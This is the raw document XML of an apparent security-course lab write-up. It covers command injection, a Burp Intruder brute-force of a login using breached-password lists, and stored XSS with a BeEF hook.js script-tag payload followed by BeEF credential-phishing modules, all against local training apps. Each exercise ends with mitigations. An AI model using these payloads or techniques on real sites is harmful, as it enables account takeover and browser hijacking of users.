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Web Application 1: Your Wish Is My Command Injection: Part 1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2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Vagrant and open a browser.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20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Open the terminal an and run the command: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200" w:before="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[cd ./Documents/web-vulns &amp;&amp; docker-compose up]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0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Leave the page after running the command.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00" w:before="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Open Chrome, and go to the web page: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20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http://192.168.13.25]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or [http://192.168.13.25/vulnerabilities/exec/]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00" w:before="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Login to the web page named DVWA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00" w:before="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User name: admin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200" w:before="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Password: password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0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Go to the Command Injection option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0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Type in the following IP addresses and commands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00" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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ect-passwd.png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00" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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ect-host.png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Recommended mitigation strategies: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Have Server-side validation that does not allow the selection of unintended files.​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00" w:before="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Segregation of confidential files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0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Restrict web server account accessibility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/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f"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application 2: A Brute Force to Be Reckoned With: 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0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Open Vagrant and go to the webpage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00" w:before="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http://192.168.13.35/install.php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.]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00" w:before="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Then login into the page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200" w:before="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Login: bee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20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Password: bug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00" w:before="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Then in [bwapp] go to the webpage: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20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[http://192.168.13.35/ba_insecure_login_1.php]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00" w:before="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Use [FoxyProxy] and [Burp Suite] that we downloaded from the past week's activities to access the login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before="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Lo/gin: test-user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Password: test-passwd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before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/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bwapp.png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before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/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Burp Suite.png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0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Click the Intruder tab and Verify Target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00" w:before="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Setup Positions, select attack type Cluster bomb, and Configure and add login and password as positions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200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr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Target.png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00" w:before="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On the Payload tab, choose [Payload type] as “Simple list”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spacing w:after="200" w:before="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[List of Administrators] is for the first payload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spacing w:after="200" w:before="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[Breached list of Passwords] is for the second payload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200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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Payload.png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00" w:before="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Start the attack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200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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attack.png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200" w:before="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The result gave that the username was [tonystark] and the password was [I am Iron Man]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200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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Login.png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color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommended mitigation strategies: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200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigations can include requiring complex usernames and passwords, using multi-factored authentication, and enabling a lockout after a certain amount of failed login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="24292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Rule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="24292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b w:val="1"/>
          <w:color w:val="24292f"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="24292f"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application 3: Where's the BeEF?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0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BeEF hook and write payload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200" w:before="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BeEF hook: http://127.0.0.1:3000/hook.js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20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Payload: &lt;script src="http://127.0.0.1:3000/hook.js"&gt;&lt;/script&gt;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00" w:before="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Change the max length of the message box from “50” to “100” then put the payload in the message box.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00" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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maxlength.png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00" w:lineRule="auto"/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 couple of BeEF exploits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00" w:before="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Social Engineering &gt;&gt; Pretty Theft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00" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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petty theif.png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00" w:before="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Social Engineering &gt;&gt; Fake Notification Bar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200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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fake notifcation bar.png</w:t>
        </w:r>
      </w:hyperlink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]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00" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="144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Host &gt;&gt; Get Geolocation (Third Party)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200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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third party.png</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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0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Recommended mitigation strategies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00" w:lineRule="auto"/>
        <w:ind w:left="144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Input validation is a common method used to mitigate cross-site scripting.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NPsUzeHLZltZledAln7j9mieNShIeh_2/view?usp=sharing" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1VdOPVZfuNQHpyyCTS6zlKFCOSL3YBq3-/view?usp=sharing" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/18RicgrR9dZASuEQ2xVv7hAbb9MuBihsB/view?usp=sharing" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1CAAU8QZ7HsTFIa6B7pAecDFDpJuto_Bz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kHOUg9hRcIAGAXFy55OJJgPFCMNmHb_0/view?usp=sharing" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1l-orF6OspvEsU1BykRf_9V9owp396ASG/view?usp=sharing" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1rfYmNhW7OlQ0O6mVlhb1Loml5m44zSGc/view?usp=sharing" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1lsw-CzHZkRc3AVXGUZ1AJ3ARK7EYTBzS/view?usp=sharing" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/11RnheVy86u6DnjHVwXKJlSkZFhX8XEes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gFm8u4qdYvaYI0lYihXns1ofa2CLmao/view?usp=sharing" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1TH_T7FKU91UYHdoV7Um5pZ5skWX8H32p/view?usp=sharing" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1Ulw49WtjL08gutXPfW33rqpoGQWw6n4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